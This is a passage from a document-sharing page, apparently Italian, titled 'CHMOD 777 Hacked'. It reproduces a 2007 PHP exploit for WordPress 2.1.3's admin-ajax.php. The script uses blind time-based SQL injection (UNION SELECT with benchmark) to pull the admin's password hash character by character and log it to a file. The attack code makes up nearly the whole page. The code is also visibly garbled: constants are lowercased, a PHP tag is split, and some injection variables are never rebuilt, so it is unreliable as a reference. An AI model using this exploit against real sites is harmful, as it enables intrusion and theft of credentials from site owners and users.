CHMOD 777 Hacked

<?
php
error_reporting(e_all);
$norm_delay = 0;
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// wordpress 2.1.3 "admin-ajax.php" sql injection blind fishing exploit
// written by janek vind "waraxe"
// http://www.waraxe.us/
// 21. may 2007
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
//=====================================================================
$outfile = './hacked.txt';// log file. ingat kasih chmod 777
$url = 'http://target_loe.xxx/wp-admin/admin-ajax.php';
$testcnt = 300000;// use bigger numbers, if server is slow, default is 300000
$id = 1;// id of the target user, default value "1" is admin's id
$suffix = '';// override value, if needed
$prefix = 'wp_';// wordpress table prefix, default is "wp_"
//======================================================================
echo "target: $url\n";

echo "sql table prefix: $prefix\n";
if(empty($suffix))
{
$suffix = md5(substr($url, 0, strlen($url) - 24));
}
echo "cookie suffix: $suffix\n";
echo "testing probe delays \n";
$norm_delay = get_normdelay($testcnt);
echo "normal delay: $norm_delay deciseconds\n";
$hash = get_hash();
add_line("target: $url");
add_line("user id: $id");
add_line("hash: $hash");
echo "\nwork finished\n";

echo "questions and feedback - http://www.waraxe.us/ \n";
die("see ya! smile \n");
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
function get_hash()
{
$len = 32;
$field = 'user_password';
$out = '';
echo "finding hash now ...\n";
for($i = 1; $i < $len + 1; $i ++)

{
$ch = get_hashchar($field,$i);
echo "got $field pos $i --> $ch\n";
$out .= "$ch";
echo "current value for $field: $out \n";
}
echo "\nfinal result: $field=$out\n\n";
return $out;
}
///////////////////////////////////////////////////////////////////////
function get_hashchar($field,$pos)
{
global $prefix, $suffix, $id, $testcnt;
$char = '';
$cnt = $testcnt * 4;
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
$ipattern = " union all select 1,2,user_pass,4,5,6,7,8,9,10 from %susers where
id=%d and if(ord(substring($field,$pos,1))%s,benchmark($cnt,md5(1337)),3)/*";
// first let's determine, if it's number or letter

$inj = sprintf($ipattern, $prefix, $id, ">57");
$post = sprintf($ppattern, $suffix, $inj, $suffix);
$letter = test_condition($post);
if($letter)
{
$min = 97;
$max = 102;
echo "char to find is [a-f]\n";
}
else
{
$min = 48;
$max = 57;
echo "char to find is [0-9]\n";
}
$curr = 0;
while(1)
{
$area = $max - $min;
if($area < 2 )
{
$inj = sprintf($ipattern, $prefix, $id, "=$max");
$eq = test_condition($post);
if($eq)
{
$char = chr($max);
}
else
{
$char = chr($min);
}
break;
}
$half = intval(floor($area / 2));
$curr = $min + $half;
$inj = sprintf($ipattern, $prefix, $id, ">$curr");

$bigger = test_condition($post);
if($bigger)
{
$min = $curr;
}
else
{
$max = $curr;
}
echo "curr: $curr--$max--$min\n";

}
return $char;
}
///////////////////////////////////////////////////////////////////////
function test_condition($p)
{
global $url, $norm_delay;
$bret = false;
$maxtry = 10;
$try = 1;
while(1)
{
$start = getmicrotime();
$buff = make_post($url, $p);
$end = getmicrotime();
if($buff === '-1')

{
break;
}
else
{
echo "test_condition() - try $try - invalid return value ...\n";
$try ++;
if($try > $maxtry)
{
die("too many tries - exiting ...\n");
}
else
{
echo "trying again - try $try ...\n";
}
}
}
$diff = $end - $start;

$delay = intval($diff * 10);
if($delay > ($norm_delay * 2))
{
$bret = true;
}
return $bret;
}
///////////////////////////////////////////////////////////////////////
function get_normdelay($testcnt)
{
$fa = test_md5delay(1);
echo "$fa\n";
$sa = test_md5delay($testcnt);
echo "$sa\n";
$fb = test_md5delay(1);
echo "$fb\n";
$sb = test_md5delay($testcnt);
echo "$sb\n";
$fc = test_md5delay(1);
echo "$fc\n";
$sc = test_md5delay($testcnt);
echo "$sc\n";
$mean_nondelayed = intval(($fa + $fb + $fc) / 3);

echo "mean nondelayed - $mean_nondelayed dsecs\n";
$mean_delayed = intval(($sa + $sb + $sc) / 3);
echo "mean delayed - $mean_delayed dsecs\n";
return $mean_delayed;
}
///////////////////////////////////////////////////////////////////////
function test_md5delay($cnt)
{
global $url, $id, $prefix, $suffix;
// delay in deciseconds
$delay = -1;
$ppattern = 'cookie=wordpressuser_%s%%3dxyz%%2527%s; wordpresspass_%s%%3dp0hh';
$ipattern = ' union all select 1,2,user_pass,4,5,6,7,8,9,10 from %susers where
id=%d and if(length(user_pass)>31,benchmark(%d,md5(1337)),3)/*';
$inj = sprintf($ipattern, $prefix, $id, $cnt);
$start = getmicrotime();
$buff = make_post($url, $post);
$end = getmicrotime();
if(intval($buff) !== -1)

{
die("test_md5delay($cnt) - invalid return value, exiting ...");
}
$diff = $end - $start;

$delay = intval($diff * 10);
return $delay;
}
///////////////////////////////////////////////////////////////////////
function getmicrotime()
{
list($usec, $sec) = explode(" ", microtime());
return ((float)$usec + (float)$sec);
}
///////////////////////////////////////////////////////////////////////
function make_post($url, $post_fields='', $cookie = '', $referer = '', $headers =
false)
{
$ch = curl_init();
$timeout = 120;
curl_setopt ($ch, curlopt_url, $url);
curl_setopt ($ch, curlopt_returntransfer, 1);
curl_setopt ($ch, curlopt_connecttimeout, $timeout);
curl_setopt($ch, curlopt_post, 1);
curl_setopt($ch, curlopt_postfields, $post_fields);
curl_setopt($ch, curlopt_followlocation, 0);
curl_setopt ($ch, curlopt_useragent, 'mozilla/4.0 (compatible; msie 6.0; windows
nt 5.1; sv1; .net clr 2.0.50727)');
if(!empty($cookie))
{
curl_setopt ($ch, curlopt_cookie, $cookie);
}
if(!empty($referer))
{
curl_setopt ($ch, curlopt_referer, $referer);
}
if($headers === true)

{
curl_setopt ($ch, curlopt_header, true);
}
else
{
curl_setopt ($ch, curlopt_header, false);
}
$fc = curl_exec($ch);
curl_close($ch);
return $fc;
}
///////////////////////////////////////////////////////////////////////
function add_line($buf)
{
global $outfile;
$buf .= "\n";
$fh = fopen($outfile, 'ab');
fwrite($fh, $buf);
fclose($fh);
}
///////////////////////////////////////////////////////////////////////
?>

CHMOD 777 Hacked

Caricato da

Informazioni sul documento

Copyright

Formati disponibili

Condividi questo documento

Condividi o incorpora il documento

Opzioni di condivisione

Hai trovato utile questo documento?

Questo contenuto è inappropriato?

Copyright:

Formati disponibili

CHMOD 777 Hacked

Caricato da

Copyright:

Formati disponibili

<?

echo "target: $url\n";

echo "cookie suffix: $suffix\n";

echo "testing probe delays \n";

echo "\nwork finished\n";

echo "finding hash now ...\n";

for($i = 1; $i < $len + 1; $i ++)

echo "\nfinal result: $field=$out\n\n";

// first let's determine, if it's number or letter

$inj = sprintf($ipattern, $prefix, $id, ">$curr");

echo "curr: $curr--$max--$min\n";

if($buff === '-1')

$diff = $end - $start;

$mean_nondelayed = intval(($fa + $fb + $fc) / 3);

if(intval($buff) !== -1)

$diff = $end - $start;

if($headers === true)

Potrebbero piacerti anche